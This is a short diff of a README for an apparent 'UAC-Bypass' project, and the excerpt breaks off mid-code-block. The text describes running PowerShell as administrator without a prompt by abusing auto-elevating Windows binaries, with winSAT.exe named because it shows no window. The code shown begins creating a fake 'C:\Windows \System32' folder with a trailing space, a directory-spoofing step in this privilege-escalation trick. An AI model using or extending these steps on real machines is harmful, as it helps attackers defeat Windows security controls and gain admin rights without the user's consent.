HttS3at/UAC-Bypass/README.md

 This should execute some powershell code as admin.\
 Next we need to find some autoelavate applications.
 I prefer to use winSAT.exe as there is no visual GUI when ran.
 Heres some other <a href="#auto-elavate-applications">Auto elavate applications</a>.

-Okay so the powershell source code
+Okay so the you need to edit the powershell source code
 ```powershell
 New-Item '\\?\C:\Windows \System32' -ItemType Directory
 Set-Location -Path '\\?\C:\Windows \System32'